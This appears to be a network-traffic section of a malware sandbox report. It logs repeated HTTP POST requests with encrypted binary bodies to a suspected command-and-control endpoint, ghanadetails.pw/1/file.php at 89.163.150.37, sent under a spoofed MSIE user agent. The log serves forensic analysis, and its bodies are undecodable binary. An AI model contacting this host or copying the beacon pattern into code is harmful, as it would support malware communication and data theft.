User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

.\xde\x86\x19/jKpg\x10[\xbb\x11\xd5}6,'\xa7\x8b\x01E}\x0b\xde\xcd\x90`0zLDVDg\xcf\xf0\xc9O?\xba	\xa9f\xfc\xa3\\xc3\x16V\xe9SVe\x8d\x869\x86\xc1\x0b\xa09\xd9\x8f_t\xed\xd6,\xaf\xde3`\x1b%\xec\x1e\xa6:rwR\xd11+q\x1a\x93kd\xa0.\x9c\xd8\xea\xed\xdb\xd8\xf7;P\x08\x94O`\xa8)\x06\xec`
L&\xa92\xcf\x16(\xb4R\x10\x94=\x949[\xbeJw|

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xe0\x1a\xbfZ\xe2\x94
-\x07Ar\xa7h5\x9b\x9a\xe7\x10\x9e\x81\xfb\xb5\xe3\xf3\xb7\x87s\xe0\xf8\xc4\x89\x15\xc5\xdd\x03\xd1`jS?\x87\x05\xdd'\xb0\xf0\xdaY\xbe\xa4-\xdfu.\xf9\xd0\xa3\x0c\xb8T\xb7X\xc3\x01\x1f>Z\x1bo\xdf\x11\xe0\x8e\xc4\x82~\xe9\xc8RP2\xebf\xb5_\x0f
\xe5\x8c\xa0\xcd \xda\xe8\xa12\xca\xc3\x11\xa7B)
\xcd\xdf&\xdf\xc5J_3?2A\xd4\x1a'\x13\xe1a\xa6\x01\x01\xcb:)\xf4\x83n\\xcf.!\x04Y\xe7~cc<\xc4\xe0

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

Z\xcbDe\x8f\xc8\xb3\xd8\x89*\xfb\xda\xdc\xa6k@\x95\x15\xb9?\x10/$^{\xf2j\xd7sg\xbe\x9d\xf7\x84pf\x85\xbebB\x81\xe6\xdc\xd2\x8c\xeb\xa2\x0bD)\x82\xe9\x16<\xb6\xf5\xe7\xf1)\xeb\xb4s|\x01\xa5\xef\xa1$\x02\x83\xa8\x15\x00\xaf\x0b\x03][\xa2\x8a@\xeeA\x0b\xb4\x95\xcdH@\xd5\xd4\x17QK\x96\xba\xf8\x9ab\x10\xa7\xfd;\xb0\xd9\xc5\xde0vDKm\xc8\xcc{,D\x01\xaeD\xe2\xfc\x90t9\x02K\x83\xd4\x8d4\x11LX\xe0\x12\xf0\x08\xeaAps

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xd4\x11\xf3\x1b\xbb\xa5\xcc\xe9
3\xa9F{=\xe7\xec\xde\xb6B\xdc6\x94(\x92'De\xec\x13\xceAy\x9d\xba#\xfcU7\xf9\x97\xe6\x1bj\xaa\xcf\x94\xcaC\xebn\x9d\xee\xd4c^\xdd_\xa3\xc240>g\x01+5\x16Z6\xee\xd7$\x83\xb6Y\x9f\xfa\xc0.&\x0bM\xba\xe8\x92.\xc1\x84\x1cc\xdb,1\xe2i^\x92\xa41\x8awt\xa0e\xbe8hH5;#%g\x8bd+\x86^FlZ\xae{\xab\xbdOP\x83ZW\x83ox5\x9f#s\x11\xb8\xdd\xd7\xe8

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

T\x951\x03\x85\xeb\xf1\xcfc|i\x95m\xf1\xae:\x16\xc8}7\xb8Q\x14L\xdd\xe3\xf6\x83Jz\x8d\xfd\x86\xa5z\x7f\xf0\xe2_*\x14\xcf1\xe2v\x9b\x0c\x9a\xf5S\xb0\xfa\x80\xd5c\x88\xe50.o]\xbe\x9f\xb1\x1b\x01d\xf2\xb8\x10Z\xb2ZI)\xfc\\xbc\xd7@s\x835\xb3\xac[M\xeaVt\xf8\xf3\xd8\xe6\x15j&\x14\xc7\xa6}\x0e\xa9w\xe3C\x9c\xaf\x17\xc3^\xc7\x9b\xc1o\xf4;\xa8I\x81\x94=\xdc\xf0\xd0\xcf\xa83jc\xe1\xd8\xee\xd9\x00\xe2\xf9\xb7\xdb\xb5y\x9d\xcb\x15\x04

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\xad\x1eP!\xa0\xf0\x8a
\xa0\x08S\x8e\x86\xa6\xc6(\xe8g\xa2Y\xd1\xd6\xd3\xe2i+\xc8\x84'\x10/9\xbb\xea\xdf\x99\x11=\xe0,\x13\x7f\xcf=Y\x08\xa0L\xcf8\xabP-\x96`\xe2\x95<\xd4\xac\xf4\x10\xf9\xb1\xe2\x8a\x05\xd0\x9d\x0b!p\x99=\x13\xe7\xb7\xeb\xbfR\x8d,\xea\xdd\xc5\xdc\x8aD\xe2\xbc\xc6\xf4\xb5\x8c\xb7\xae\x1b[b@\x9c\xd1\x16q\xe4\xf3bp8P\xf2\x11\xa1\xaat^\x96\xebJ\xeb\xe41&3ya\xce3\x93\xe8\x80\xfa\xcb\xc2{ :\xc3\xe1\xae\x92\xca\xa3\x07\xfa

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\x97\xe2(I\xe1\x166\xe4\xc2\xac\xdb\xf4\x85$l\xa3n\xb5~\xab;\x18\x0c\xc7\x12\x02\x8cT\xbd\xed\x1e\xcdu\xe2S\x05\xa4/\xa81\x85/\xb3\xb3\xae~\xfe3\xbd\x1e\x83V3\xacK3\x1a\xe1d\x88\x9a\x19<\xb1\xd8v}\xb8\xdc\xed\x9d\x99\xfb\x99\x9b\x9d\xb4i\x15\xd9\x0b\xfe6//\x12Ua\x99\x95\x82$/q\x86Z\xd5S\xee\xdc)\xc3^lr\xa3\x1e\xfe\xcf&\xacn\xd3\x8c\X\x88\xd1a:k\xec\x96\x17\x17h\x0b3\xa9\x14\xf8\x92\x8a$\xc7\xc9Xgi\xd4\x91H	\x8c|

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

m\xf9|#sO\x8cg\x9b\x0c'F<\xe7\xd4CUr@a\x8aFW`\x0fNxJ\xe7\xdf\xf2\x0fQ'\xd9\xb1\xe8\xa8\xccl\x02Q\x91\xdf\x04M\xc8\xe7u6\xb7\x10\x9d\xfe?o\x14\xac\xdao9\xd2)\x8a\x19V\x12\xe9u\x8f\x1c!\x99\x02\\x146\x91\x96\x02\x0b\x023\xde\xa5w5\xfd\xbf\xe2M\x01NxQ\xa3\xd6\xb1COBc\x1d\x16\xd2\xfa\x1b\xb5\x8f\x1c\xedw\x11\xb2\x9bk\xc4r\xc7`\x8fY\x9b\xf0\xb4\xa3\x1e\x08h4\x99\xdd0Y\x18)d\xa3\xaaX\x1c

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xa4\xe6\xd2D\xb2\xd6y\x14\xa8\xf0O\xd4\xf5\xa2\x8f\xd1\xd0\xe1\xcf\x0e\x97~\xe3bxE\x05\xda6G/[\xccl#\x82}emKe\xf9\xad\x19\x99\\xc7!\xa4\xf1l+\xd4\x92\xdf97\xf3\xf3\xab\xbc\x1e\xa0\x8a\xd0I\xbc\x8e\xb4\x16\xe9R\xaa\xfe4\x86\xff\xd4\xcd\x90\x8e\x91\xbc\xb1\xb8O\x81\xff\xc8\xe90\x91\x9f\xe0\x8c\xf7K\xfa\xb9|\xd7\xae\xbc1\xb5R's\x12
\xe2\xb1\xc0u@P\x8d\x1e'6\xac\x06\xb241o\x97\x08\xa1+7\xba\xf1\xc0\xedZW_\xc2\xca\xd5

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xf3\xa6i\x0cH\xd3o\x17y8\x93+\xce\xeb\x91\xe1VHR\x9c\xe3\x8fi\xd0\xa4)\xe4H4VU\x0c\xcc{\xcf\x9d\xd07,\x1f\xe3f&\xb1\xf5B\x8eFu\x0f\xa6\xee\xf74\x02\xdc\xbc\xc8En\xe9X\x8d\x8a\x87	\x07\xc6N\x13\xffQ{6\xe8y\xc4\x9d\xd3\xa0\x088!#\xcc\xbe\x0bM\x14\x85\xd1\x03\x9d\xf1\xf6\xa0K\xedUcz\xfc\xfde3\xcd\xac\xdb~\x13\xab\xd6\x11\x8b\x8a\x95\xae\xb8\xfa\xd3'=\x04\xf1d)\xba\x08\xf6k\x8c\xf2\x0b\xc5\xfbY\x86\x97\x1e5\xee

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\xf2\xba%\xf3\x99\xde\xcf\xdd$\xda2$B\xc2\x8d\xa9\x96o\x11x\x84\x9b\x8ck,\x070\xb1\xc3h,\xdf\x11\xbb_\xbe\xdd\xe6P	bX[b4/7\xc77\x85\xc4;H \xe7}P\xd7\xfaA\xc8\xb0"\x8f\x83\x10N<\x9a\x1bZ\x9e#\xd1LsM\xb1\xca\xed\xcd\x1ag\xc2\xae\xaf\xeb\xf3\x99\xae\x00\xffo\xca\x8av\x9c'\xcfJ}'\x8by\xb8\xf9\xdb\x02$\xecaH\x07z\x1f\xa7\x08m\xde\xa9y\xc5\x06\xdeQ\xd2EJ\xab\x18

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\x16\xf2\xf0Rt\xf4\x0e\x07\xd1\xfb\xc1\xf9\xb1\xf1!\xfdH\xfeU\x03\xca}\xf2T\xda\x99o\x84S\xd6\xe4\xe9\xc3\xc5\xbc)\x06\xfa\xa7\xe5\xa1O\x9e\x89\xf1*\xad\xa5\xdf"\xb6v0\xf0\xaft\x90\x7f\x93Bn8\xdc\x8fgX\x9b\x9dw1\x9bD\xd6\xf0\xbf\xae\xbe\x82f\xb9\x13\x8b#\xb9\xe0I\x95\xcco0_\xca\xfftB@NY,\xdd\xa6;|\x95{\xee\x1e\xe9\xe1\xe9\xfb*\xef\xddm\xeap\xbd\x96\xa0\xb9mo\xdd\xf7Z\xbbJOP

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

7	\xd3U\x01:\x07\xf8
\x17\x7f*S\x1aa8\xc7\xe4\xfb\x0c\xd4\x02\xe4mz
\x16v\x8d\xdc\x8b\xcf\xc4\x18\xb9\x08U\x12\x88<[\x85\x06|5\xe7\xcbFv\x1e>_\x08\xa9\x9fk\x16\xca\xcc\x96\x96\x14\x95\x8fF\xa3\xb8\x9a\x02\xff\x92\xbb
\x1c\x01}\i&|\x9c\x91\x8d\xb6\xfe6\x83\xf5\xcf\xa3&8!~-fI\x84)\xfc\xf5\xd3SL\x81$\x86\x1c%$\x9d\xc9F\xe1\xe5\xc3H\xe4\xa6\xbf?\xd80	\x0fv\xf2Jn\xab

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xd6\xee\xa9\x97\x86\xa1B\xe0R3\xe2\x88\xe2:,V\xe2-p\x8d\x89\x1eV\x99?=\xd1\xc8\x81\x13$\xca,\xf6\xca\xc3\xdb\x80\xc4-
\xa8\x92\xd7\xe5 \xb2JdF\x1c\x0c\xd8Z\x93e\xf4i\xc5\xa3\x11P\xb1\x01)\xcaL\xd6\x0b\xeaY-\xdb\xb6\x12Qc\xc7\xe5\x9c7\xd6\x88\xb9-\xa4\xbf\x8f\x04\x1ao\x08\xa3?\x0c\xed#\xe8\xd8\xb5\xf9\xc3\x9d\xdfU\x8b\x905\x1f\x8f[,\xe8\xa3\xe5\xc9\x8ag\x8b\xd4\xf1d|<\x9c!\x86\x83X\xa8\xd9\xe3E1\x11*+\x11\xf3\x13N\xef

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\x85\xaeq\x84N\xf2[$\x8a,\xf3\x9f\x1a;\xea\xd8\x1e\xf9\xb5\x06"\xcf(5\x08A1\xe3\xcd\xed\xf3\x02\xb7~\xda\x18\xdb\x1b\x15!\x1d\x7fK\x08\xd5\xe9\xbc\x0cPZ\x11O\xbbC%\x01\x0b\xdd\xed@\x95f\xae\x01z\x8a\x94\xc5\xc3\xb9@\xe9\x03\xa9\x03F\x9b\xc6#\x12\xcb\x02M2\x86u\xc1#3f\x8f#\xef\xc1\xdb%\xb8`\xc8n\xf9XL\xd3E\I\xea/FUj\xdc\xbf\xe8\x8a\xe9~=\xb0\x0e\xd0T\xdf\x18\x17\x99\x83\x0b\xe8\x01\xf0\x8db\x08\xee\xf3\x0e\xe2\x04\xb6\xee

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\x88A\xbd\xe2\x88g	\xf4\x14\x91 \x15\xd8\xd2\x80\xe0xE\xfc\x96\x14z\xdf\x9d\x85C"\x06h\xd8\xb8\x10\xa8\x83\x04l\x0f\x9cU\xe3\x91\xd0\x8a\x90\x05\x12\xc4&$\xf4J\xcd\x9f\xe4\xc0\xbb\x94\xcd\xec\xb7"A\xf7\x01weX\xa3\x05,\x129\x9d\x14\xd0\xccY/I*\xad\xbe\x04\xa2\xb0\xc06\x8b\xbed\x9c\xc6J\xf4\x907\xa7\x9d\x16\x1a-\xdf\x0c\x11\xc9\xf3\x88r\xff\xbd-@\xa8\x11\xb3\x08\xcd\xd9\xd8
\x91\xc0U(\xaf0\xc0\x83\x06\x07\xcd\x96K\xf7Z>m\xb31\x8et\x07

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

b\xf0\xec\x9e\xe3\x93\xae\x89\xd5d\xaf\x12\xe0\xfa\xbep\xe2\xe9,\xf9\xde\xfc1\xc9_\x16\xde{2\x0fa\xf7\xba\xca\xad\xe8\x9c\x90
f\xa8\xdd\xfdo\xf1\x9a\x16\xda\x0bx\xeb>\xecrL\x07m\xcf\x0c\x9d/\xc1y\xb1-d\xb9o\xdeh\x05\xf4\xecQ\xef{\xd1\xb7\xc7
\x87\xa2d}\xca\xf6ho\xd4\x81\xd0\x0b\xa0\x93\xf9`\x1a{\x101\x11|\xfc;_QP"\x90\xc2D\x87e\xea40W\x0ff\x0e\x1c\xc2\xfe\x02\xa2\xb0N3\\x06<E\x88\xa1_\xa4O\xaf\x1d2\xf4\x96\xdb_\xf0

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\x98\xbbaO\x1f\xff\x9e&\xe6[\xee+\x02/^\xaf\xb6e
\x9bB\x0b\x87\xd1	\x930Q\x9c\xfae\x99.\xefNW\x0e\x92T\xa7\xf5\x8c\xd28}!\x98k1\x9a\xa32\x1e\xeb\x94qU$\x8c\xd9\xefZ\x13\xb1\xd7/4\xbe"\x045[\xdfn\xaeB3b'\xd5\xd3.B\x1fV\x01\xdew\x82\x04>!\x0ef\xfd\x0e\x8e^\xf3\x8e\x83~\xa2\xfa\x02\x00\x7fu\x1cy\xca6_\x08|<\xa5\x96\xbex$)~Fb+$3\xa6M\xb1\x94t\xcdo\x0b|\x90\\x0b\x16C;\x80\xa4

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

e\xb1{Fe\x0f\x0e@0@\xb4\xf28\xf2R\xd1\xc3\xe0\x03U\x8c4\xb7E\x10S~\x8c\x9f\xc2#\xd5\x9f\xa9\x18\x128.\x88\x8do\xdb\xc4\xad\x0b\xb0\xd8Y\x08S\xe6\xb0\x9c\x98\xe8\xa9\x00\xa8\x8eH\xa0.\x19\xb1*%.\xb7X\xf4\xa5=	u\xf4\x9b	\xbf+\xab\xa6\xabK\xd1\x98>\xee\xe3\x9b\xc4p\xfc
^\xbbB?\x18\xa5\xcb\xb5\xc2~\xd0\x98Wi\xe0j\xe8\x8a\x04f\xc19\xbe'\xe5\xc2\xa0q\xa5|\xd7-_.3[G\xab\x9d\x0e=\xffm\xaa\x8b\x06\xd2,\x9e7\xfe\xd1

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\x93B\x05<\x06@\xfbYe\xbc\x8f\x1ee\xe2\xdd0\xe40\xe1\`\x0cn\x9dL\x04\xb8O\xf8\xa7\xc5\xa1\x012\x0e\x003	\x15\xfcRO\x97)\xf3\xe6o:j\xda\xb8\x83\xd9\x1a\xa8<\xf9H\xb4\xc4\x88\x04\xb0\x8a\xe7\xedk\xf6\x00\x80k\x1fg\xb2\xf4Lo\x94\x9fq\xba@\x92\xe3O=\x0c\x00\xfc\xa8\x8d\x04Q\x00f
\x86\xa4\x94\xfe\x99\xc2\xc4\x86\x82\xe4\x1dCx\xb7J\xaa\x0e^\x94\xf8\x80\x96P3b\xbd\xf5[\x05u\x87\x08\x96\x8f\xe0\xc2EVo\x17\x9a\x13\x02\x00E

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

3\xc0\xde\xa3D\x1e\xce3\xfd#\xc79F\xa7\xc4\x94K\xf7\xc44y\xaf\x04W\x14\xdb\xdd\xc6_-\xbfuud\x01K\xa5\x83\xf4B\x1e\x04\x0b\xda\x04w\xa2J\x11\xc9I?\x14m\x16"uC\x05\x99\xfbZ\x1e\x8aGo\xb0iB\xde^u\xff-\xbckL\xd1\x86\xd5\x15\x87\xb7\x8bV\x9ef\xca\xa4w\xe8\x8d\xf6\x8a\x1c\xd9\xf2\xf2\x9b\xb5\x0fH%8\xce\xaf\x81\xb0\x8f&\x87\xdauMeDM\xe1\xee-\xee\xb6D\x06v+)\x086
;]\x07\x08Z}\x02\x8cJ'f

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

~\x8cd\xda\xa53\xc2\x8f\xe0\x19\x8c\xe5T\x15d!\xb7%\xf5\x9f@D\xc0\xb8\xf0j\xbe\x80\x03\xad\xcd\xbd\xf0\xe0s\xfa\x8cf06\xcb\xf6\x88\xce\xde
\xca7%\xd3\xb0\\xe5N\x1a\x05Y:\xae\x17o\x12\xa4\x8a
#
\x10\xa3\xf3R\xc9\xe2\x17\xf7\xb7^c&`\xe9U\x86 ou\xa2%@\xc6\x8b\xcb\xaa
n\x11wv\xe9\x04&\xad\xe1L\x1b]\x02\xa4U\\xef\xa7AW\x9c'\xbc\xc2\xe2
\xc2\xcf\xef\x88\xe2c\x93\x08{A\x81$\xe6%V\xc1\x1f\xb6\x01\xfbt

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\xd8\x82 \xe0\x03\xaf\x07\x91N;\x9f\x10\x14\x88\x83':\xfb\xcb\xbb\xd2\xec=_\x91!\xd0\xc0a\x17\x90~\x9a"\xfb\x0c\xe669\xe4\xa9\x18W\xf7\xc3\xc4\x98\xe8:\xb0\xbfY\xbf\xf6\xf7\xe8LP\xbb\x91\xcbn?\x8f\xa9(K/\x00j\x92\xd2I0\xe1G\x1b\xfb\xc4ca\x8e\xbd\x01\xf8\xd8Z\xc7$\x88\xe0\x8e\xcd\xb56\xd7\x17\xbek\xf8F\xf7\xe2\x94s\xb9\xd7\x97\xd3\x07\xceg
Od\xc5\xff\xbb\xce<eBG\x0eR\x0cXJ\x81

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

